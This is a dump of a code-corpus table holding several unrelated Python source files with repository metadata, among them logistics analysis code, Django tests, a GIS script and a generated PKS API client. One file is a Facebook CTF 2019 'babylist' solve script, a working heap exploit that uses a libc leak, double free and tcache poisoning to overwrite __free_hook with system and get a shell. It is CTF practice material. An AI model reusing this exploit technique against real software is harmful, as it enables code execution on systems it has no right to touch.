hexsha stringlengths 40 40 | size int64 5 2.06M | ext stringclasses 10 values | lang stringclasses 1 value | max_stars_repo_path stringlengths 3 248 | max_stars_repo_name stringlengths 5 125 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 3 248 | max_issues_repo_name stringlengths 5 125 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 67k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 3 248 | max_forks_repo_name stringlengths 5 125 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 5 2.06M | avg_line_length float64 1 1.02M | max_line_length int64 3 1.03M | alphanum_fraction float64 0 1 | count_classes int64 0 1.6M | score_classes float64 0 1 | count_generators int64 0 651k | score_generators float64 0 1 | count_decorators int64 0 990k | score_decorators float64 0 1 | count_async_functions int64 0 235k | score_async_functions float64 0 1 | count_documentation int64 0 1.04M | score_documentation float64 0 1 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
0dc75b65a9507820b7a1135f0816c7e8f573fa2d | 654 | py | Python | mitmproxy/contentviews/auto.py | KarlParkinson/mitmproxy | fd5caf40c75ca73c4b767170497abf6a5bf016a0 | [
"MIT"
] | 24,939 | 2015-01-01T17:13:21.000Z | 2022-03-31T17:50:04.000Z | mitmproxy/contentviews/auto.py | PeterDaveHello/mitmproxy | 4bd7b6c4eadeaca712f63e0e73f20bcf6aadbffb | [
"MIT"
] | 3,655 | 2015-01-02T12:31:43.000Z | 2022-03-31T20:24:57.000Z | mitmproxy/contentviews/auto.py | PeterDaveHello/mitmproxy | 4bd7b6c4eadeaca712f63e0e73f20bcf6aadbffb | [
"MIT"
] | 3,712 | 2015-01-06T06:47:06.000Z | 2022-03-31T10:33:27.000Z | from mitmproxy import contentviews
from . import base
class ViewAuto(base.View):
name = "Auto"
def __call__(self, data, **metadata):
# TODO: The auto view has little justification now that views implement render_priority,
# but we keep it around for now to not touch more parts.
priority, view = max(
(v.render_priority(data, **metadata), v)
for v in contentviews.views
)
if priority == 0 and not data:
return "No content", []
return view(data, **metadata)
def render_priority(self, data: bytes, **metadata) -> float:
return -1 # don't recurse.
| 31.142857 | 96 | 0.616208 | 597 | 0.912844 | 0 | 0 | 0 | 0 | 0 | 0 | 178 | 0.272171 |
0dc892c0ef85acbf71fdb47d9850dae8da0e6d7a | 10,355 | py | Python | code/services/synergy_services.py | EdsonECM17/DS_Proyecto_02_Synergy_Logistics | a6c347f99e69b926d337db82653dd16850668f4b | [
"MIT"
] | null | null | null | code/services/synergy_services.py | EdsonECM17/DS_Proyecto_02_Synergy_Logistics | a6c347f99e69b926d337db82653dd16850668f4b | [
"MIT"
] | null | null | null | code/services/synergy_services.py | EdsonECM17/DS_Proyecto_02_Synergy_Logistics | a6c347f99e69b926d337db82653dd16850668f4b | [
"MIT"
] | null | null | null | from typing import List
from processing.sl_filters import SynergyLogisticsFilters
class Service(SynergyLogisticsFilters):
"""
Clase que contine servicios para el analisis de la tabla de Synergy Logistics.
"""
def get_routes_list(self, direction:str or None = None) -> List:
"""Genera una lista con todas las rutas diferentes de la tabla.
Args:
direction (str or None, optional): Dirección de transacción. Defaults to None.
Returns:
List: Lista con rutas con formato origen-destino.
"""
routes_list = []
# Filter tables by direction
filtered_table = self.filter_routes_df(direction=direction)
# Check row by row table
for index, row in filtered_table.iterrows():
# route=origin-destination
route = (row['origin']+ "-" + row['destination'])
if not route in routes_list:
routes_list.append(route)
return routes_list
def get_total_elements(self, direction:str or None = None, year:int or None = None, transport_mode:str or None = None) -> int:
"""
Cuenta el número de transacciones en una tabla filtrada.
Se pueden filtrar resultados por dirección, año y/o medio de transporte.
Args:
direction (str or None, optional): Dirección de transacción. Defaults to None.
year (int or None, optional): Año de transacciones. Defaults to None.
transport_mode (str or None, optional): Tipo de medio de transporte. Defaults to None.
Returns:
int: Total de casos en tabla filtrada.
"""
# Tabla filtrada
filtered_table = self.filter_routes_df(direction=direction, start_year=year,
end_year=year, transport_mode=transport_mode)
# Contar filas en la tabla
elements_count= len(filtered_table)
return elements_count
def get_route_frecuency(self, route:str, direction:str or None = None, year:int or None = None)-> int:
"""
Cuenta las veces que una ruta aparece en una tabla filtrada.
Se pueden filtrar resultados por dirección, año y/o medio de transporte.
Args:
route (str): Rutas con formato origen-destino.
direction (str or None, optional): Dirección de transacción. Defaults to None.
year (int or None, optional): Año de transacciones. Defaults to None.
Returns:
int: Numero de apariciones de ruta en la tabla filtrada.
"""
# Obtener origen y destino para filtros
origin, destination = route.split("-")
# Tabla filtrada
filtered_table = self.filter_routes_df(origin=origin, destination=destination, direction=direction,
start_year=year, end_year=year)
# Contar filas en la tabla
route_frecuency = len(filtered_table)
return route_frecuency
def get_total_value(self, direction:str or None = None, year:int or None = None, transport_mode: str or None = None) -> int:
"""
Suma el valor total dentro de una tabla filtrada.
Se pueden filtrar resultados por dirección, año y/o medio de transporte.
Args:
route (str): Rutas con formato origen-destino.
direction (str or None, optional): Dirección de transacción. Defaults to None.
year (int or None, optional): Año de transacciones. Defaults to None.
transport_mode (str or None, optional): Tipo de medio de transporte. Defaults to None.
Returns:
int: suma de valor de elementos en tabla filtrada.
"""
filtered_table = self.filter_routes_df(direction=direction, start_year=year, end_year=year, transport_mode=transport_mode)
total_value = filtered_table["total_value"].sum()
return total_value
def get_route_value(self, route:str, direction:str or None = None, year:int or None = None) -> int:
"""
Suma el valor total para una ruta especifica dentro de una tabla filtrada.
Se pueden filtrar resultados por dirección, año y/o medio de transporte.
Args:
route (str): Rutas con formato origen-destino.
direction (str or None, optional): Dirección de transacción. Defaults to None.
year (int or None, optional): Año de transacciones. Defaults to None.
transport_mode (str or None, optional): Tipo de medio de transporte. Defaults to None.
Returns:
int: suma de valor de elementos en tabla filtrada.
"""
origin, destination = route.split("-")
filtered_table = self.filter_routes_df(origin=origin, destination=destination, direction=direction,
start_year=year, end_year=year)
route_value = filtered_table["total_value"].sum()
return route_value
def get_top_ten(self, all_cases: dict) -> dict:
"""De un diccionario de elementos se obtienen los 10 casos con mejores resultados.
Args:
all_cases (dict): Diccionario con todos los casos
Returns:
List: Lista con los 10 casos con mejores resultados.
"""
top_ten_cases = sorted(all_cases, key=all_cases.get, reverse=True)[:10]
top_ten_dict = {}
for case in top_ten_cases:
top_ten_dict[case] = all_cases[case]
return top_ten_dict
def get_transport_frecuency(self, transport:str, direction:str or None = None, year:int or None = None)-> int:
"""
Cuenta las veces que un transporte aparece en una tabla filtrada.
Se pueden filtrar resultados por dirección, año y/o medio de transporte.
Args:
transport (str): Tipo de medio de transporte.
direction (str or None, optional): Dirección de transacción. Defaults to None.
year (int or None, optional): Año de transacciones. Defaults to None.
Returns:
int: Numero de apariciones de transporte en la tabla filtrada.
"""
# Tabla filtrada
filtered_table = self.filter_routes_df(transport_mode=transport, direction=direction,
start_year=year, end_year=year)
# Contar filas en la tabla
transport_frecuency = len(filtered_table)
return transport_frecuency
def get_transport_value(self, transport:str, direction:str or None = None, year:int or None = None) -> int:
"""
Suma el valor total para un transporte especifico dentro de una tabla filtrada.
Se pueden filtrar resultados por dirección, año y/o medio de transporte.
Args:
transport (str): Tipo de medio de transporte.
direction (str or None, optional): Dirección de transacción. Defaults to None.
year (int or None, optional): Año de transacciones. Defaults to None.
Returns:
int: suma de valor de elementos en tabla filtrada.
"""
filtered_table = self.filter_routes_df(transport_mode=transport, direction=direction,
start_year=year, end_year=year)
transport_value = filtered_table["total_value"].sum()
return transport_value
def get_country_frecuency(self, origin:str or None = None, destination:str or None = None, direction:str or None = None, year:int or None = None)-> int:
"""
Cuenta las veces que un pais aparece en una tabla filtrada.
Se pueden filtrar resultados por dirección, año y/o medio de transporte.
Args:
origin (str or None, optional): Pais de origen. Defaults to None.
destination (str or None, optional): Pais de destino. Defaults to None.
direction (str or None, optional): Dirección de transacción. Defaults to None.
year (int or None, optional): Año de transacciones. Defaults to None.
Returns:
int: Numero de apariciones de transporte en la tabla filtrada.
"""
# Tabla filtrada
filtered_table = self.filter_routes_df(origin=origin, destination=destination, direction=direction,
start_year=year, end_year=year)
# Contar filas en la tabla
transport_frecuency = len(filtered_table)
return transport_frecuency
def get_country_value(self, origin:str or None = None, destination:str or None = None, direction:str or None = None, year:int or None = None) -> int:
"""
Suma el valor total para un pais especifico dentro de una tabla filtrada.
Se pueden filtrar resultados por dirección, año y/o medio de transporte.
Args:
origin (str or None, optional): Pais de origen. Defaults to None.
destination (str or None, optional): Pais de destino. Defaults to None.
direction (str or None, optional): Dirección de transacción. Defaults to None.
year (int or None, optional): Año de transacciones. Defaults to None.
Returns:
int: suma de valor de elementos en tabla filtrada.
"""
filtered_table = self.filter_routes_df(origin=origin, destination=destination, direction=direction,
start_year=year, end_year=year)
transport_value = filtered_table["total_value"].sum()
return transport_value
def reorder_dict_max(self, data_dict: dict) -> dict:
"""
Ordena diccionario a partir de valores de mayor a menor.
Elimita los elementos del diccionario que tengan un valor de 0.
Args:
data_dict (dict): Diccionario de datos desordenados.
Returns:
dict: Diccionario de datos filtrados.
"""
# Crear nuevo diccionario para almacenar datos ordenados
ordered_data_dict = {}
ordered_keys = sorted(data_dict, key=data_dict.get, reverse=True)
for key in ordered_keys:
# if value is 0, skip
if data_dict[key] == 0:
continue
# if value > 0
else:
ordered_data_dict[key]=data_dict[key]
return ordered_data_dict
| 45.416667 | 156 | 0.630324 | 10,313 | 0.991825 | 0 | 0 | 0 | 0 | 0 | 0 | 5,861 | 0.563666 |
0dc9078dabe0f46493d9055058389898b1c4669b | 467 | py | Python | src/bspline-insert.py | kaykayehnn/geometric_design | 206977275abb2bc195665175b504dca13e4792bd | [
"MIT"
] | 2 | 2022-03-17T13:35:13.000Z | 2022-03-27T07:45:12.000Z | src/bspline-insert.py | kaykayehnn/geometric_design | 206977275abb2bc195665175b504dca13e4792bd | [
"MIT"
] | null | null | null | src/bspline-insert.py | kaykayehnn/geometric_design | 206977275abb2bc195665175b504dca13e4792bd | [
"MIT"
] | null | null | null | from sympy import init_printing, Rational
from classes.BSpline import BSpline
init_printing()
# INPUT DATA HERE
knots = [
0,
0,
0,
Rational(2, 5),
Rational(1, 2),
Rational(3, 5),
1,
1,
1,
]
# fmt: off
control_points = [
[2,2],
[0,2],
[0,0],
[-2,0],
[0,-2],
[2,-2],
]
# fmt:on
points_to_insert = [
Rational(7, 10),
Rational(7, 10),
]
bspline = BSpline(knots)
bspline.insert(control_points, points_to_insert)
| 12.972222 | 48 | 0.5803 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 35 | 0.074946 |
0dca40621184466cd9ce1c9762d5d83692b16fb4 | 2,765 | py | Python | app/recipe/tests/test_tag_apis.py | NhatHox23/nhat-recipe-backend | 9a6bb84f43ceea94671b9a5a6318f7df648d597f | [
"MIT"
] | null | null | null | app/recipe/tests/test_tag_apis.py | NhatHox23/nhat-recipe-backend | 9a6bb84f43ceea94671b9a5a6318f7df648d597f | [
"MIT"
] | null | null | null | app/recipe/tests/test_tag_apis.py | NhatHox23/nhat-recipe-backend | 9a6bb84f43ceea94671b9a5a6318f7df648d597f | [
"MIT"
] | null | null | null | from django.contrib.auth import get_user_model
from django.urls import reverse
from django.test import TestCase
from rest_framework import status
from rest_framework.test import APIClient
from recipe.models import Tag
from recipe.serializers import TagSerializer
from core.tests.utils import sample_tag, sample_user
TAG_LIST_URL = reverse('recipe:list-tag')
TAG_CREATE_URL = reverse('recipe:create-tag')
class PublicTagListAPI(TestCase):
def setUp(self):
self.user = sample_user()
self.tag = sample_tag(user=self.user)
self.client = APIClient()
self.payload = {
"user": self.user.id,
"name": "Unit Test Tag"
}
def test_list_tag_unauthenticated(self):
"""Test listing tag without log-in"""
res = self.client.get(TAG_LIST_URL)
self.assertEqual(res.status_code, status.HTTP_401_UNAUTHORIZED)
def test_create_tag_unauthenticated(self):
"""Test creating tag without log-in"""
res = self.client.post(TAG_CREATE_URL, self.payload, format="json")
self.assertEqual(res.status_code, status.HTTP_401_UNAUTHORIZED)
class PrivateTagListApiTest(TestCase):
def setUp(self):
self.user = sample_user()
self.tag = sample_tag(user=self.user)
self.client = APIClient()
self.client.force_authenticate(self.user)
self.payload = {
"user": self.user.id,
"name": "Unit Test Tag"
}
def test_list_tag_authenticated(self):
"""Test listing tag with log-in"""
res = self.client.get(TAG_LIST_URL)
self.assertEqual(res.status_code, status.HTTP_200_OK)
tags = TagSerializer(Tag.objects.all(), many=True)
self.assertEqual(res.data, tags.data)
def test_tags_limited_to_user(self):
"""Test that tags returned are for the authenticated user"""
user2 = sample_user(email="test2@nhat.com")
sample_tag(user=user2, name="test tag 2")
res = self.client.get(TAG_LIST_URL)
self.assertEqual(res.status_code, status.HTTP_200_OK)
self.assertEqual(len(res.data), 1)
self.assertEqual(res.data[0]["name"], self.tag.name)
def test_create_tag_authenticated(self):
"""Test creating tag withd log-in"""
res = self.client.post(TAG_CREATE_URL, self.payload, format="json")
self.assertEqual(res.status_code, status.HTTP_201_CREATED)
created_tag = Tag.objects.get(**self.payload)
self.assertEqual(res.data["name"], created_tag.name)
def test_create_tag_invalid_payload(self):
invalid_payload = {}
res = self.client.post(TAG_CREATE_URL, invalid_payload, format="json")
self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)
| 35.448718 | 78 | 0.679928 | 2,351 | 0.850271 | 0 | 0 | 0 | 0 | 0 | 0 | 353 | 0.127667 |
0dcacc77536f475e69d67672d4386a6d8109dc9e | 1,029 | py | Python | tests/test_toolkit.py | eng-tools/sfsidb | 5260d64e5ab78db7bab209ac4b34617ebafe9762 | [
"MIT"
] | 1 | 2020-07-03T09:33:49.000Z | 2020-07-03T09:33:49.000Z | tests/test_toolkit.py | eng-tools/sfsidb | 5260d64e5ab78db7bab209ac4b34617ebafe9762 | [
"MIT"
] | 1 | 2020-07-03T09:40:16.000Z | 2020-07-06T01:23:40.000Z | tests/test_toolkit.py | eng-tools/sfsidb | 5260d64e5ab78db7bab209ac4b34617ebafe9762 | [
"MIT"
] | null | null | null | from sfsidb import load as sload
from sfsidb import toolkit
from sfsidb import checking_tools as ct
from sfsidb import sensor_file_reader as sfr
from tests.conftest import TEST_DATA_DIR
def test_get_depth_from_sensor_code():
sensor_ffp = TEST_DATA_DIR + "test-sensor-file.json"
si = sfr.read_json_sensor_file(sensor_ffp)
mtype = "ACC"
sensor_number = 2
code = sload.get_sensor_code_by_number(si, mtype, sensor_number)
assert code == "ACCX-NFF-S-M"
print(code)
depth = toolkit.get_depth_by_code(si, code)
assert depth == 0.0
code = "ACCX-UB2-L2C-M" # number = 4
depth = toolkit.get_depth_by_code(si, code)
assert ct.isclose(depth, 63.6)
def test_old_style_sensor_code_file():
sensor_ffp = TEST_DATA_DIR + "test-old-sensor-file.json"
si = sfr.read_json_sensor_file(sensor_ffp)
sensor_code = "ACCX-NFF-L2C-M"
depth = toolkit.get_depth_by_code(si, sensor_code)
assert ct.isclose(depth, 63.6)
if __name__ == '__main__':
test_old_style_sensor_code_file() | 30.264706 | 68 | 0.730807 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 123 | 0.119534 |
0dcbb2c8e1a6f536fd7f94e8770c33962e2f268b | 1,699 | py | Python | nhoods/setup.py | MSLADevServGIS/NhoodProfiles | aa35d2a4d4be177dc8df79a34915eefb31a20634 | [
"MIT"
] | null | null | null | nhoods/setup.py | MSLADevServGIS/NhoodProfiles | aa35d2a4d4be177dc8df79a34915eefb31a20634 | [
"MIT"
] | null | null | null | nhoods/setup.py | MSLADevServGIS/NhoodProfiles | aa35d2a4d4be177dc8df79a34915eefb31a20634 | [
"MIT"
] | null | null | null | # Setup procedures -- WIP
import os
import re
import arcpy
arcpy.env.workspace = "in_memory"
# TODO: out_gdb = "//cityfiles/DEVServices/WallyG/projects/NhoodProfiles/nhoods/data/NhoodAmenities.gdb/MtStatePlane"
# DATA PROCESSING
# Nhood_buffers:
arcpy.Buffer_analysis("Nhoods", "nhood_buffers",
buffer_distance_or_field="100 Feet",
line_side="FULL", line_end_type="ROUND",
dissolve_option="LIST", dissolve_field="Name",
method="PLANAR")
# Parks:
parks = os.path.join(
r"\\cityfiles\Shared\PARKS AND RECREATION SHARED\GIS Data",
r"Parks Data.gdb\Parks")
arcpy.FeatureClassToFeatureClass_conversion(parks, "in_memory", "mem_parks")
# Delete Parks Fields
arcpy.DeleteField_management("mem_parks", drop_field="Reference;Rec_Date;Doc_Links;Subtype;Ownership;Origin;Maintenance;Platted_Size;Maint_Level;Status;Assessors_Parcel_No;Acres;Dev_Status;Owner_Type;Maint_Responsibility;Shape_Length;Shape_Area")
# COMMON AREAS
CAMA = r"W:\DATA\CAMA\Missoula\MissoulaOwnerParcel_shp\MissoulaOwnerParcel_shp.shp"
arcpy.Select_analysis(CAMA, "in_memory/mem_commons", '''"LegalDescr" LIKE
\'%COMMON%\'''')
# make new field "CAName"
arcpy.AddField_management("mem_commons", "CAName", "TEXT", "", "", 50)
with arcpy.da.UpdateCursor("mem_commons", ["LegalDescr", "CAName"]) as cur:
for row in cur:
row[1] = re.split("\W\s", row[0])[0].strip().title()
cur.updateRow(row)
arcpy.Dissolve_management(in_features="mem_commons", out_feature_class="in_memory/mem_commons_Diss", dissolve_field="CAName", statistics_fields="", multi_part="SINGLE_PART", unsplit_lines="DISSOLVE_LINES")
# Merge
| 32.673077 | 246 | 0.723955 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 918 | 0.540318 |
0dcc982e8e10f4b504acced8db3b8e7638f722fe | 2,085 | py | Python | Gathered CTF writeups/ptr-yudai-writeups/2019/Facebook_CTF_2019/babylist/solve.py | mihaid-b/CyberSakura | f60e6b6bfd6898c69b84424b080090ae98f8076c | [
"MIT"
] | 1 | 2022-03-27T06:00:41.000Z | 2022-03-27T06:00:41.000Z | Gathered CTF writeups/ptr-yudai-writeups/2019/Facebook_CTF_2019/babylist/solve.py | mihaid-b/CyberSakura | f60e6b6bfd6898c69b84424b080090ae98f8076c | [
"MIT"
] | null | null | null | Gathered CTF writeups/ptr-yudai-writeups/2019/Facebook_CTF_2019/babylist/solve.py | mihaid-b/CyberSakura | f60e6b6bfd6898c69b84424b080090ae98f8076c | [
"MIT"
] | 1 | 2022-03-27T06:01:42.000Z | 2022-03-27T06:01:42.000Z | from ptrlib import *
import re
import time
def create(name):
sock.recvuntil("> ")
sock.sendline("1")
sock.sendline(name)
def add(index, value):
sock.recvuntil("> ")
sock.sendline("2")
sock.sendline(str(index))
sock.sendline(str(value))
def view(index, pos):
sock.recvuntil("> ")
sock.sendline("3")
sock.sendline(str(index))
sock.recvuntil("into list:\n")
sock.sendline(str(pos))
line = sock.recvline()
r = re.findall(b"(.+)\[(.+)\] = (.+)", line)
w = int(r[0][2])
if w < 0:
w = (0xffffffff ^ (- w - 1))
return r[0][0], int(r[0][1]), w
def dup(index, name):
sock.recvuntil("> ")
sock.sendline("4")
sock.sendline(str(index))
sock.sendline(name)
def remove(index):
sock.recvuntil("> ")
sock.sendline("5")
sock.sendline(str(index))
libc = ELF("./libc-2.27.so")
sock = Process("./babylist")#Socket("localhost", 4001)
#sock = Socket("challenges3.fbctf.com", 1343)
main_arena = 0x3ebc40 + 0x60
one_gadget = 0x10a38c
create("0") # 0
for i in range(0x50 // 4):
add(0, 0x1111)
dup(0, "1") # 1
for i in range(0x50 // 4):
add(1, 0x2222)
create("libc leak") # 2
remove(1)
# fill up tcache for 0x21
for i in range(8):
create(str(i)) # 3-9
remove(1)
for i in range(3, 9):
remove(i)
remove(2)
# libc leak
addr_main_arena = (view(0, 1)[2] << 32) | view(0, 0)[2]
libc_base = addr_main_arena - main_arena
logger.info("libc base = " + hex(libc_base))
# double free
create("1") # 1
for i in range(8):
add(1, 0xcafe)
dup(1, "PON") # 2
for i in range(8):
add(1, i + 4)
add(2, i + 4)
# TCache Poisoning
target = libc_base + libc.symbol('__free_hook') - 8
create("evil") # 3
add(3, target & 0xffffffff)
add(3, target >> 32)
for i in range(3):
add(3, 0xdead)
#addr_one_gadget = libc_base + one_gadget
addr_system = libc_base + libc.symbol("system")
create("dummy") # 4
for i in range(5):
add(4, 0xbeef)
create("free hook") # 5
add(5, u32("/bin"))
add(5, u32("/sh\x00"))
add(5, addr_system & 0xffffffff)
add(5, addr_system >> 32)
add(5, 0)
sock.interactive()
| 21.27551 | 55 | 0.607674 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 406 | 0.194724 |
0dce3b2e494bf63f350d54551978be23a2419c37 | 43,142 | py | Python | container_service_extension/lib/pksclient/api/profile_api.py | arunmk/container-service-extension | 5e67df64fd5ed7fbb664d449356cb983cecbca12 | [
"BSD-3-Clause"
] | 81 | 2017-07-05T19:42:41.000Z | 2022-03-09T22:04:05.000Z | container_service_extension/lib/pksclient/api/profile_api.py | arunmk/container-service-extension | 5e67df64fd5ed7fbb664d449356cb983cecbca12 | [
"BSD-3-Clause"
] | 670 | 2017-07-05T16:48:02.000Z | 2022-03-31T13:40:53.000Z | container_service_extension/lib/pksclient/api/profile_api.py | arunmk/container-service-extension | 5e67df64fd5ed7fbb664d449356cb983cecbca12 | [
"BSD-3-Clause"
] | 64 | 2017-07-05T16:32:55.000Z | 2022-03-23T09:36:03.000Z | # coding: utf-8
"""
PKS
PKS API # noqa: E501
OpenAPI spec version: 1.1.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
# python 2 and python 3 compatibility library
import six
from container_service_extension.lib.pksclient.api_client import ApiClient
class ProfileApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def add_compute_profile(self, body, **kwargs): # noqa: E501
"""Create a new compute profile # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.add_compute_profile(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param ComputeProfileRequest body: Compute profile info (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.add_compute_profile_with_http_info(body, **kwargs) # noqa: E501
else:
(data) = self.add_compute_profile_with_http_info(body, **kwargs) # noqa: E501
return data
def add_compute_profile_with_http_info(self, body, **kwargs): # noqa: E501
"""Create a new compute profile # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.add_compute_profile_with_http_info(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param ComputeProfileRequest body: Compute profile info (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method add_compute_profile" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `add_compute_profile`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth', 'uaa'] # noqa: E501
return self.api_client.call_api(
'/compute-profiles', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def add_kubernetes_profile(self, body, **kwargs): # noqa: E501
"""Create a new kubernetes profile # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.add_kubernetes_profile(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param KubernetesProfileRequest body: Kubernetes profile info (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.add_kubernetes_profile_with_http_info(body, **kwargs) # noqa: E501
else:
(data) = self.add_kubernetes_profile_with_http_info(body, **kwargs) # noqa: E501
return data
def add_kubernetes_profile_with_http_info(self, body, **kwargs): # noqa: E501
"""Create a new kubernetes profile # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.add_kubernetes_profile_with_http_info(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param KubernetesProfileRequest body: Kubernetes profile info (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method add_kubernetes_profile" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `add_kubernetes_profile`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth', 'uaa'] # noqa: E501
return self.api_client.call_api(
'/kubernetes-profiles', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def add_network_profile(self, body, **kwargs): # noqa: E501
"""Create a new network profile # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.add_network_profile(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param NetworkProfileRequest body: Network profile info (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.add_network_profile_with_http_info(body, **kwargs) # noqa: E501
else:
(data) = self.add_network_profile_with_http_info(body, **kwargs) # noqa: E501
return data
def add_network_profile_with_http_info(self, body, **kwargs): # noqa: E501
"""Create a new network profile # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.add_network_profile_with_http_info(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param NetworkProfileRequest body: Network profile info (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method add_network_profile" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `add_network_profile`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth', 'uaa'] # noqa: E501
return self.api_client.call_api(
'/network-profiles', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_compute_profile(self, profile_name, **kwargs): # noqa: E501
"""delete_compute_profile # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_compute_profile(profile_name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str profile_name: The compute profile name (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_compute_profile_with_http_info(profile_name, **kwargs) # noqa: E501
else:
